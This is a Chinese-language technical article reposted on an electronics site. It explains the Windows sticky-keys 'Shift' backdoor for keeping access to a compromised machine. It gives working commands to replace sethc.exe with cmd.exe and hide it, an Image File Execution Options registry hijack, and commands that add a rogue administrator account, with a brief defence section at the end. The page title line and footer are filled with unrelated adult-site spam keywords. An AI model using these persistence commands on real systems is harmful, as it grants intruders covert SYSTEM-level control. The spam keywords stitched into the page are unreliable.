色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

Windows Shift后門利用

jf_hKIAo4na ? 來(lái)源:Mi1k7ea ? 2023-01-30 10:38 ? 次閱讀

0x00 前言

通常,在內(nèi)網(wǎng)滲透打下一臺(tái)機(jī)子之后,可以給這臺(tái)機(jī)子留個(gè)Shift后門。

0x01 Shift后門利用

簡(jiǎn)介

粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動(dòng)系統(tǒng)的粘滯鍵功能,其進(jìn)程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。

黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會(huì)啟動(dòng)黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠(yuǎn)程計(jì)算機(jī)時(shí),在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動(dòng)該漏洞,進(jìn)而控制遠(yuǎn)程計(jì)算機(jī)。

漏洞原理

在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運(yùn)行,并且此時(shí)應(yīng)用程序會(huì)以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運(yùn)行,所以計(jì)算機(jī)一旦被安裝該后門,入侵者便可悄無(wú)聲息地遠(yuǎn)程操縱計(jì)算機(jī)。

漏洞利用

大致思路如下:

拿到目標(biāo)主機(jī)權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;

其中,命令行方式為:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要將dllcache文件夾中的緩存刪掉,否則會(huì)自動(dòng)復(fù)原回去。

注冊(cè)表方式為:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說(shuō)明:reg add是向注冊(cè)表添加記錄,后面跟的是注冊(cè)表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個(gè)目錄是用來(lái)設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過(guò)/ v來(lái)指定鍵名,其中鍵名debugger是固定的,然后通過(guò)/ t來(lái)指定REG_SZ字符串類型,最后通過(guò)/ d來(lái)指定鍵的值,即被惡意替換的程序cmd.exe。

這樣,在下次遠(yuǎn)程連接目標(biāo)主機(jī)登錄的時(shí)候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;

可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;

當(dāng)然,上面的方法存在缺陷,就是可能會(huì)導(dǎo)致遠(yuǎn)程連接無(wú)法持久進(jìn)行,因此可以直接添加新用戶便于下次直接登錄:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問(wèn);

直接將其刪除,最好的方法是在控制面板-輔助功能選項(xiàng)-粘滯鍵選項(xiàng),將“使用快捷鍵”取消即可。;

通過(guò)注冊(cè)表設(shè)置實(shí)現(xiàn)防御;

審核編輯 :李倩

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • WINDOWS
    +關(guān)注

    關(guān)注

    3

    文章

    3541

    瀏覽量

    88633
  • 應(yīng)用程序
    +關(guān)注

    關(guān)注

    37

    文章

    3267

    瀏覽量

    57684
  • Shift
    +關(guān)注

    關(guān)注

    0

    文章

    5

    瀏覽量

    7467

原文標(biāo)題:Windows Shift后門利用

文章出處:【微信號(hào):菜鳥學(xué)安全,微信公眾號(hào):菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    2024 Commvault SHIFT全球巡演中國(guó)站完美收官

    近日,2024 Commvault SHIFT全球巡演 · 中國(guó)站完美收官。大會(huì)匯聚數(shù)據(jù)安全和管理領(lǐng)域的知名專家、業(yè)務(wù)掌舵人和生態(tài)伙伴,聚焦混合云趨勢(shì)下的數(shù)據(jù)保護(hù)需求變革,探討企業(yè)如何借助創(chuàng)新平臺(tái)驅(qū)動(dòng)全新范式,成就持續(xù)業(yè)務(wù)的競(jìng)爭(zhēng)優(yōu)勢(shì),呈現(xiàn)了一場(chǎng)思想和技術(shù)的盛宴。
    的頭像 發(fā)表于 12-10 16:44 ?395次閱讀

    Windows 10將于2025年終止免費(fèi)更新,微軟力推Windows 11

    近日,微軟在其官方網(wǎng)站上發(fā)布了一則通知,宣布自2025年10月14日起,將正式停止為Windows 10操作系統(tǒng)提供來(lái)自Windows更新的免費(fèi)軟件更新、技術(shù)支持以及安全修復(fù)程序。這一決定意味著
    的頭像 發(fā)表于 11-05 10:35 ?364次閱讀

    Commvault SHIFT全球線上大會(huì)圓滿落幕

    近日,Commvault SHIFT全球線上大會(huì)圓滿落幕。大會(huì)上,Commvault發(fā)布了一系列面向持續(xù)業(yè)務(wù)的平臺(tái)新功能,并攜手行業(yè)專家暢談云優(yōu)先時(shí)代的彈性趨勢(shì)。Commvault總裁兼首席執(zhí)行官
    的頭像 發(fā)表于 10-21 11:32 ?378次閱讀

    華納云:ChatGPT 登陸 Windows

    ChatGPT 現(xiàn)已在 Windows 上推出。 今天,OpenAI宣布已開始預(yù)覽其 AI 聊天機(jī)器人平臺(tái)ChatGPT的專用 Windows 應(yīng)用程序。 OpenAI 表示, ChatGPT
    的頭像 發(fā)表于 10-18 15:50 ?233次閱讀

    Windows管理內(nèi)存的三種主要方式

    Windows操作系統(tǒng)提供了多種方式來(lái)管理內(nèi)存,以確保系統(tǒng)資源的有效利用和性能的優(yōu)化。以下是關(guān)于Windows管理內(nèi)存的三種主要方式的詳細(xì)闡述,包括堆內(nèi)存管理、虛擬內(nèi)存管理以及共享內(nèi)存管理,每種方式都將從概念、原理、運(yùn)作機(jī)制和應(yīng)
    的頭像 發(fā)表于 10-12 17:09 ?724次閱讀

    Credo發(fā)布HiWire SHIFT AEC新品

    該新系列SHIFT AEC產(chǎn)品是基于Credo先進(jìn)的800G HiWire AEC設(shè)計(jì)優(yōu)化而來(lái),能效卓越,性能更佳,且具有極致的可靠性
    的頭像 發(fā)表于 09-12 14:07 ?310次閱讀

    windows11 遠(yuǎn)程連接工具

    隨著遠(yuǎn)程辦公的普及,選擇合適的遠(yuǎn)程桌面工具變得尤為重要。在Windows11上,用戶可以利用系統(tǒng)自帶的遠(yuǎn)程桌面功能,或選擇更專業(yè)的第三方解決方案,如Splashtop。本文將詳細(xì)介紹如何在
    的頭像 發(fā)表于 08-06 08:37 ?354次閱讀
    <b class='flag-5'>windows</b>11 遠(yuǎn)程連接工具

    針對(duì)Windows系統(tǒng)和macOS系統(tǒng)的全局代理修改方法

    WINDOWS
    jf_62215197
    發(fā)布于 :2024年07月16日 07:30:54

    后門!ASML可遠(yuǎn)程鎖光刻機(jī)!

    與ASML進(jìn)行光刻機(jī)問(wèn)題溝通時(shí),負(fù)責(zé)人做出了保證,他們有能力遠(yuǎn)程鎖控芯片制造設(shè)備。 這就意味著ASML傳承了歐美企業(yè)留有“后門”的習(xí)慣,而伴隨著這樣一則信息的揭露,或許很有可能會(huì)被美國(guó)所利用,徹底走向不可控的局面,而ASML絲毫不加以掩飾,這其中很可能存
    的頭像 發(fā)表于 05-24 09:35 ?564次閱讀

    微軟確認(rèn)Windows 10和Windows Server 2019更新5月版時(shí)出現(xiàn)0x錯(cuò)誤

    近期,微軟更新Windows健康控制臺(tái),公開承認(rèn)其針對(duì)Windows 10系統(tǒng)于5月份推出的更新(即KB5037765)與Windows Server 2019面臨同樣的問(wèn)題——安裝過(guò)程中可能出現(xiàn)0x800f0982錯(cuò)誤。
    的頭像 發(fā)表于 05-17 11:10 ?592次閱讀

    Windows 11 22H2新版任務(wù)管理器新增啟用隱藏功能

    關(guān)于如何隱藏調(diào)用舊版任務(wù)管理器,網(wǎng)友 @thebookisclosed 分享了詳細(xì)步驟。他指出,在現(xiàn)有 Windows 11 環(huán)境中,即使按 Ctrl+Shift+Esc 組合鍵也難以調(diào)出老版本的任務(wù)管理器,需通過(guò)特定路徑“C:\Win
    的頭像 發(fā)表于 03-27 15:08 ?485次閱讀

    趨勢(shì)科技報(bào)告揭示黑客利用Windows Defender SmartScreen漏洞進(jìn)行惡意軟件分發(fā)

    這起事故被編號(hào)為CVE-2024-21412,出現(xiàn)在Windows Defender SmartScreen之中的一項(xiàng)漏洞,攻擊者透過(guò)生成特定文件,輕易繞開微軟系統(tǒng)的嚴(yán)密安全審查。
    的頭像 發(fā)表于 03-14 09:48 ?449次閱讀

    WINDOWS系統(tǒng)有幾個(gè)版本

    Windows系統(tǒng)自1985年發(fā)布以來(lái),已經(jīng)推出了多個(gè)版本。根據(jù)不同的分類方式,Windows系統(tǒng)的版本可以分為以下幾類: 按照時(shí)間順序。包括Windows 1.0、Windows 2
    發(fā)表于 02-29 16:40

    Commvault SHIFT大會(huì)·中國(guó)站圓滿落幕

    1月18日,Commvault SHIFT 大會(huì) · 中國(guó)站圓滿落幕!本次大會(huì)以“驅(qū)動(dòng)網(wǎng)絡(luò)彈性新轉(zhuǎn)變”為主題,Commvault攜手行業(yè)專家,通過(guò)主題演講、客座分享、觀點(diǎn)碰撞等形式,為參會(huì)者帶來(lái)網(wǎng)絡(luò)彈性前沿趨勢(shì)、創(chuàng)新方法和最佳實(shí)踐的精彩分享!
    的頭像 發(fā)表于 01-23 14:46 ?942次閱讀

    傳音Infinix在CES 2024上推出最新突破性技術(shù)E-Color Shift

    近日,傳音旗下品牌Infinix在CES 2024上推出最新突破性技術(shù)E-Color Shift,可以使手機(jī)背面面板在不消耗電力的情況下改變并保持鮮艷的顏色。
    的頭像 發(fā)表于 01-23 11:39 ?1151次閱讀
    主站蜘蛛池模板: 国内精品乱码卡一卡2卡三卡新区| 欧美午夜免费观看福利片| 少妇高潮惨叫久久久久久欧美| 伊人久久伊人| 国产精品人成在线播放新网站| 免费精品美女久久久久久久久 | 日日天干夜夜狠狠爱| 洲精品无码高潮喷水A片| 国产精品资源在线观看网站| 欧美精品AV精品一区视频| 医生含着我的奶边摸边做| 国产精亚洲视频综合区| 日本强好片久久久久久AAA| 607080老太太AW| 精品视频网站| 亚洲 日韩 在线 国产 精品| 电影日本妻子| 欧美一级黄色影院| 91视频夜色| 久久偷拍国2017| 亚洲熟女丰满多毛XXXXX| 国产麻豆福利AV在线观看| 日日噜噜大屁股熟妇| gogo免费在线观看| 免费视频久久只有精品| 中文字幕免费视频精品一| 久久国产精品麻豆AV影视| 亚洲国产精品一区二区三区在线观看 | 肉色欧美久久久久久久蜜桃| 99精品久久久久久久| 麻豆产精品一二三产区区| 一本道久在线综合色色| 护士美女照片| 亚洲黄色免费观看| 国内精品日本久久久久影院| 午夜日本大胆裸艺术| 国产传媒18精品免费观看| 神马电影dy888午夜我不卡| 哒哒哒影院在线观看免费高清| 千禧金瓶梅快播| 波多野结衣的AV一区二区三区|